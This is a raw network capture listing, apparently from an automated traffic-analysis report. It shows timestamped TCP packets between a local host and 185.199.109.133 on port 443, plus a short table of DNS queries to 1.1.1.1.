                                                                        Jul 14, 2024 23:41:35.612210035 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612230062 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612284899 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612310886 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.612315893 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612330914 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612349033 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612366915 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.612373114 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.612410069 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.613255978 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613269091 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613333941 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.613339901 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613467932 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613486052 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613524914 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.613531113 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.613549948 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.614243031 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614263058 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614326954 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.614331961 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614362955 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614379883 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614413977 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.614418983 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.614442110 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.615135908 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615156889 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615204096 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.615207911 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615217924 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615231037 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615258932 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.615264893 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615282059 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.615936041 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615955114 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.615993977 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.615998030 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616014004 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616025925 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.616029024 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616060019 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.616065979 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616188049 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.616889954 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616910934 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.616965055 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.616971016 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617012024 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.617520094 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617538929 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617580891 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.617585897 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617603064 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.617666006 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617685080 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617714882 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.617721081 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.617753983 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.618472099 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618489981 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618519068 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.618524075 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618541002 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.618556976 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618577003 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618599892 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.618603945 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.618632078 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.670598030 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.676803112 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.676825047 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.676958084 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.676985025 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.677038908 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.702764988 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.702779055 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.702863932 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.702871084 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.703016996 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.703284979 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.703308105 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.703352928 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.703356981 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.703381062 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.703397989 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.703969955 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.703989029 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.704046965 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.704052925 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.704130888 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.704705954 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.704722881 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.704785109 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.704790115 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.704830885 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.705355883 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.705369949 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.705431938 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.705435991 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.705470085 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.705913067 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.705929041 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.705987930 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.705991983 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.706037045 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.706563950 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.706579924 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.706640005 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.706645966 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.706681013 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.765671968 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.765696049 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.765788078 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:35.765801907 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:35.765846014 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.247596979 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.297847986 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.297868013 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.297943115 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.297956944 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.297996044 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.333035946 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.333064079 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.333096981 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.333122015 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.333137989 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.333161116 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.333967924 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.333985090 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.334036112 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.334043026 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.334068060 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.334089041 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.334624052 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.334644079 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.334671974 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.334682941 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.334703922 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.334738016 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335051060 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335067034 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335104942 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335110903 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335150003 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335484982 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335501909 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335540056 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335545063 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335567951 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335586071 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335855007 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335876942 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335911989 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335916996 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.335939884 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.335962057 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.336416960 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.336432934 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.336486101 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.336489916 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.336568117 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.386684895 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.386710882 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.386749029 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.386756897 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.386782885 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.386825085 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.421631098 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.421650887 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.421741009 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.421758890 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.421886921 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.422610998 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.422627926 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.422662973 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.422668934 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.422693968 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.422703028 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423086882 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423103094 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423150063 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423155069 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423181057 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423193932 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423661947 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423685074 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423713923 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423721075 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.423758030 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.423782110 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424169064 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424184084 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424225092 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424230099 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424249887 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424571991 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424598932 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424602985 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424609900 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.424628973 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424650908 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424674034 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.424999952 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.425017118 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.425057888 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.425064087 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.425090075 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.425108910 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.475383997 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.475409031 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.475450993 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.475459099 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.475483894 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.475506067 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.510566950 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.510607004 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.510631084 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.510638952 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.510688066 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.511395931 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.511413097 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.511467934 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.511473894 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.511641979 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.511894941 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.511919022 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.511966944 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.511972904 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.512013912 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.512343884 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.512367964 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.512403011 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.512408972 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.512445927 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.512469053 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.512998104 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513015985 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513046026 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.513051033 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513077974 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.513099909 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.513727903 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513745070 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513778925 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.513783932 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.513811111 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.513837099 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.514029980 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.514046907 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.514094114 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.514098883 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.514123917 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.514168024 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.563952923 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.563977003 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.567169905 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.567181110 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.567331076 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.599206924 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.599236965 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.599315882 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.599325895 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.599366903 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.600052118 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600066900 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600135088 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.600140095 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600225925 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.600548029 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600564957 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600627899 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.600634098 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.600708008 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.601082087 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.601098061 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.601155996 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.601161957 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.601465940 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.601764917 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.601782084 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.601841927 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.601847887 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602169991 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602190018 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602226973 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.602232933 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602255106 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.602278948 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.602854013 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602873087 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.602924109 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.602931023 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.603035927 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.652780056 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.652802944 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.652873039 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.652879953 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.652913094 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.687968969 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.687993050 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.688051939 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.688066006 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.688093901 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.688113928 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.688805103 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.688822031 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.688877106 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.688884020 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.688920021 CEST49729443192.168.2.5185.199.109.133
                                                                        Jul 14, 2024 23:41:36.689204931 CEST44349729185.199.109.133192.168.2.5
                                                                        Jul 14, 2024 23:41:36.689229012 CEST44349729185.199.109.133192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2024 23:41:31.497489929 CEST | 52233 | 53 | 192.168.2.5 | 1.1.1.1
Jul 14, 2024 23:41:31.505983114 CEST | 53 | 52233 | 1.1.1.1 | 192.168.2.5
Jul 14, 2024 23:41:34.028191090 CEST | 55179 | 53 | 192.168.2.5 | 1.1.1.1
Jul 14, 2024 23:41:34.035373926 CEST | 53 | 55179 | 1.1.1.1 | 192.168.2.5
Jul 14, 2024 23:41:44.012006044 CEST | 64655 | 53 | 192.168.2.5 | 1.1.1.1
Jul 14, 2024 23:41:44.019701958 CEST | 53 | 64655 | 1.1.1.1 | 192.168.2.5
Jul 14, 2024 23:41:45.501876116 CEST | 60895 | 53 | 192.168.2.5 | 1.1.1.1
Jul 14, 2024 23:41:45.612310886 CEST | 53 | 60895 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
